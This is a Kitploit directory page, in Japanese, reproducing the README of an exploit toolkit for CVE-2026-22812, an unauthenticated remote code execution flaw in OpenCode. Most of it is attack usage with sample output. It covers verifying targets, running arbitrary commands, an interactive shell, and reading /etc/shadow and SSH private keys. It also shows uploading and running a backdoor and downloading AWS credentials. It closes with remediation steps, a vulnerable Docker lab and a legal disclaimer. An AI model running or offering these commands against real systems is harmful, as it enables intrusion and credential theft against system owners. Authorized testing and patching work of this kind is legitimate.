Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22812-exploit — CVE-2026-22812(OpenCode 未認証 RCE)向けのエクスプロイトツールキット。対話型シェル、任意コマンド実行、ファイルのアップロード/ダウンロード、システム列挙を提供し、許可されたセキュリティテストを支援します。 | Kitploit
ツール/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

CVE-2026-22812(OpenCode 未認証 RCE)向けのエクスプロイトツールキット。対話型シェル、任意コマンド実行、ファイルのアップロード/ダウンロード、システム列挙を提供し、許可されたセキュリティテストを支援します。

リポジトリを見る
3367ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-22812 エクスプロイトツール

Python CVSS

CVE-2026-22812 - OpenCode 認証なしRCE のためのフル機能エクスプロイトツールキット


🎯 概要

CVE-2026-22812 エクスプロイトツールは、OpenCode の認証なしリモートコード実行の脆弱性に対する包括的なエクスプロイトフレームワークです。このツールは、対話型シェル、ファイル操作、システム列挙など、複数のエクスプロイト手法を提供します。

脆弱性の詳細

  • CVE ID: CVE-2026-22812
  • 影響を受けるバージョン: OpenCode < 1.0.216
  • CVSS スコア: 8.8 (High)
  • 攻撃ベクトル: ネットワーク
  • 認証: 不要
  • 影響: システム全体の完全な侵害

✨ 機能

🔓 エクスプロイト機能

  • ✅ 認証なしセッション作成
  • ✅ 任意のコマンド実行 (RCE)
  • ✅ コマンド履歴付き対話型シェル
  • ✅ ファイルアップロード/ダウンロード
  • ✅
任意のファイル読み取り
  • ✅ PTY セッション作成
  • ✅ システム列挙
  • ✅ プロキシサポート (Burp Suite 互換)

  • 📦 インストール

    前提条件

    • Python 3.7+
    • pip
    • requests ライブラリ

    クイックインストール

    root@kitploit:~
    # リポジトリのクローン
    git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
    cd CVE-2026-22812-exploit
    
    # 依存関係のインストール
    pip3 install -r requirements.txt
    

    手動インストール

    root@kitploit:~
    pip3 install requests urllib3
    

    🚀 使用方法

    基本的なエクスプロイト

    1. ターゲットが脆弱かどうかを確認

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 --verify
    

    出力:

    root@kitploit:~
    [+] Target is VULNERABLE to CVE-2026-22812!
    [+] Session ID: abc123def456
    

    2. 単一コマンドの実行

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 -c "id"
    

    出力:

    root@kitploit:~
    [*] Creating session...
    [+] Session created: abc123def456
    [+] Target is VULNERABLE!
    
    [*] Executing: id
    [+] Command executed successfully
    
    uid=1000(developer) gid=1000(developer) groups=1000(developer)
    

    3. 対話型シェルモード

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 -i
    

    対話型セッション:

    root@kitploit:~
    [+] Session created: abc123def456
    [+] Target is VULNERABLE!
    
    [*] Entering interactive shell mode
    [!] Type 'help' for commands, 'exit' to quit
    
    developer@target$ whoami
    developer
    
    developer@target$ pwd
    /home/developer/workspace
    
    developer@target$ ls -la
    total 48
    drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
    drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
    -rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
    ...
    
    developer@target$ read /etc/hostname
    [*] Reading file: /etc/hostname
    [+] File read successfully (10 bytes)
    dev-server-01
    
    developer@target$ exit
    [*] Exiting...
    

    📚 詳細な使用方法

    コマンド実行

    root@kitploit:~
    # 単一コマンド
    python3 exploit.py -t http://target:4096 -c "whoami"
    
    # 複雑なコマンド
    python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"
    
    # 複数のコマンド
    python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"
    

    ファイル操作

    ファイルの読み取り

    root@kitploit:~
    # 機密ファイルの読み取り
    python3 exploit.py -t http://target:4096 -r /etc/passwd
    python3 exploit.py -t http://target:4096 -r /etc/shadow
    python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa
    

    ファイルのアップロード

    root@kitploit:~
    # シェルスクリプトのアップロード
    python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh
    
    # バイナリのアップロード
    python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload
    
    # 実行付きアップロード
    python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
    python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"
    

    ファイルのダウンロード

    root@kitploit:~
    # 設定ファイルのダウンロード
    python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt
    
    # 認証情報のダウンロード
    python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt
    
    # ソースコードのダウンロード
    python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json
    

    システム列挙

    root@kitploit:~
    # システム情報の収集
    python3 exploit.py -t http://target:4096 --sysinfo
    

    出力:

    root@kitploit:~
    {
      "hostname": "dev-server-01",
      "username": "developer",
      "user_id": "uid=1000(developer) gid=1000(developer)",
      "current_dir": "/home/developer/workspace",
      "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
      "os_release": "Ubuntu 22.04.3 LTS",
      "ip_address": "192.168.1.10",
      "processes": "..."
    }
    

    修復手順

    1. 直ちに更新: npm install -g opencode-ai@latest
    2. プロセスの停止: pkill -f opencode
    3. ログの確認: 侵害の痕跡がないかシステムログを確認
    4. 認証情報のローテーション: パスワード、SSH キーを変更
    5. システムの監査: バックドアがないか確認

    🧪 テストラボのセットアップ

    Docker を使用する場合 (推奨)

    root@kitploit:~
    # Dockerfile for vulnerable OpenCode
    FROM node:18
    RUN npm install -g [email protected]
    EXPOSE 4096
    CMD ["opencode"]
    
    root@kitploit:~
    # ビルドと実行
    docker build -t opencode-vuln .
    docker run -p 4096:4096 opencode-vuln
    
    # エクスプロイトのテスト
    python3 exploit.py -t http://localhost:4096 -i
    

    手動セットアップ

    root@kitploit:~
    # 脆弱なバージョンのインストール
    npm install -g [email protected]
    
    # OpenCode の起動
    opencode
    
    # 別のターミナルでエクスプロイトを実行
    python3 exploit.py -t http://localhost:4096 --verify
    

    ⚠️ 脆弱なバージョンを本番環境にデプロイしないでください!


    📚 参考情報

    脆弱性情報

    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
    • GitHub Advisory: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
    • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

    ⚠️ 法的免責事項

    よくお読みください

    このツールは認可されたセキュリティテスト専用に提供されています。

    ❌ 禁止される使用

    • 不正なシステムアクセス
    • 許可のないスキャン
    • 違法行為
    • 悪意のある目的
    • 認可のない本番システムへの使用

    法的通知

    著作者は:

    • 違法な使用を容認しません
    • 誤用に対して責任を負いません
    • 違法行為を支援しません
    • 一切の責任を負いません

    このツールを使用することで、あなたは以下に同意したことになります:

    • 適切な認可を取得すること
    • すべての法律を遵守すること
    • 全責任を受け入れること
    • 倫理的かつ責任を持って使用すること

    自己責任で使用してください


    ⭐ 役に立ったらスターを! ⭐
    認可されたセキュリティテスト専用

    ツールをダウンロード